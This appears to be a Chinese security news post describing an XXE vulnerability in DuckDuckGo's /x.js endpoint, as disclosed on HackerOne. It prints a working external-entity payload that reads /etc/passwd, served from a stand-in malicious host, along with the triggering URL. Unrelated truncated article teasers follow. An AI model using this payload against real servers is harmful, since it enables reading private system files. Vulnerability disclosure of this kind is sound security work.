近期,白帽汇安全研究院发现hackerone网站披露了DuckDuckGo搜索引擎的一个XXE漏洞。
DuckDuckGo是一个出现于2011年的互联网搜索引擎,其总部位于美国宾夕法尼亚州。和传统搜索引擎(谷歌,必应等)相比,DuckDuckGo着重保护用户的隐私,不监控、不记录用户的搜索内容,还会自动处理用户发出HTTP请求中的敏感信息(如Referer头),尽量减少第三方能获取的信息。
漏洞发现者在浏览测试https://duckduckgo.com网站时,发现在路径/x.js中的参数?u存在XXE注入。
只要输入一个远程的xm l资源http://malicious_server/xxe.xml,服务器就会解析并执行,并返回一个输出。
而且网站对xm l代码没有任何控制,所以攻击者可以引入一些恶意xm l代码,对服务器进行攻击。
具体步骤如下
1.攻击者在他所控制的服务器中放上一个恶意xml文件,并对公网开放,文件内容如下。
<?xm l version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [ <!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]><creds> <user>&xxe;</user> <pass>mypass</pass></creds>
2.直接访问链接https://duckduckgo.com/x.js?u=http://malicious_server/xxe.xml
3.返回的页面可以看到xm l文件解析结果
一些被以为陈腐而陈旧的文档特性可以被完成并用于进犯,360要挟情报中心鄙人半年就针对运用Excel 4.0宏传达商业远控木马的在野进犯样本进行了剖析。 UnregisterHost unregis...
随着网络的不断发展,智能手机,不断的更新换代得同时出现了不同的系统,例如苹果、安卓系统的,不同的系统使用的方式和软件也是不同的,例如很多软件可以在苹果手机上使用,却不能在安卓手机上使用,在使用手机的过...
QQ作为一款应用程序得到了广泛的信任。 黑客如何运用技术破解微信密码 1.对于一些90后朋友来说,这款应用更多的是一种情感 。 2.虽然这款APP不像微信那么简单,在某种程度上也不像微信那样通用...
如今的汽车除了满足出行之外,还有个重要的标签是智能化,而智能化的打开方式既包括它在驾驶过程中非常智能,又包括它能在生命周期中给与消费者常开常新的感觉。作为自主品牌技术代表的比亚迪,在此环节还是挺具备优...
上交所网站消息,为充分发挥股份回购的制度功能,进一步规范上市公司回购股份行为,切实维护投资者合法权益,根据《全国人民代表大会常务委员会关于修改<中华人民共和国公司法>的决定》《关于支持上市...
继母看了她的丈夫很长时间,总是觉得他最近很奇怪。 他对她特别关心,总是对着手机傻笑。 她总是想有机会看看她的丈夫在和谁说话,笑得那么灿烂。 但她丈夫的反侦察能力很强,只要他一靠近他,看到他的手机...